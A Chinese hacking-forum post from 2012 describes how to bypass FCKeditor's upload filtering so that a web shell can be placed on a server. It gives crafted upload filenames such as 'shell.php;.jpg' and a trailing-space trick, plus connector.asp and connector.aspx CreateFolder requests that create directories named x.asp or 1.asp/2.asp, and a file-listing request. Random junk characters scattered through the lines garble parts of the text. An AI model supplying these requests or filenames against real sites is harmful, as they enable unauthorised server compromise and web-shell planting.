中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]
作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg/ X2 o4 C# k, N. ]. U8 _& x

; h) ~/ Q) O9 C" P提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。1 A6 G' A+ }, s2 v4 f2 g% o

2 K, R$ v1 I/ S3 Y. r5 i继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
' U' P- {% T9 c* s! b& {% R- p6 o7 V
突破建立文件夹:. U1 o8 i) F* \( l7 V) R

  |  I3 ?: s, h; m2 K" q5 ]editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp0 z2 R) m1 P) c$ e  a  O
9 n3 ?' K6 l  [  ]; F; D
参数:- @9 i# g, s, o5 G6 F* B

( i2 B( M4 z8 ~2 C6 e" i/ R当前目录名:CurrentFolder=/qing.asp# Q/ |, a6 X' P1 D2 m7 ]
& R0 x# A1 y$ [0 y/ y
新的目录名:NewFolderName=x.asp
1 @8 k7 J5 Q6 ^9 m7 ~( z0 a0 r2 A8 c% N
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……) x; ]7 L: k; H* l: E0 U

9 Y6 J/ w/ S, _9 x$ k7 I那么 x.asp 就已经建立生成了,此方法百试百灵!4 X' N& s& {! ]+ v) U
& g2 n. F* a& `- q3 u/ m5 J
新建文件夹参数 x.asp,基本都能搞定。
9 }; F" A6 w' Q5 t7 j2 z8 q, ^. G3 F- Q
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建. b- h" F7 [: n/ ]

# m. ?' x5 K. W, paspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
4 h0 b% a4 e) P9 [8 L. B  Y6 ^3 c4 s/ E) @0 a$ m& B" l1 {6 Z
获取文件列表
$ L* L2 s  B8 e! ~+ N: H$ z7 k       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F( s$ K$ r5 l5 b+ p  g
: {8 I! O2 h% T' H9 o! ?




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2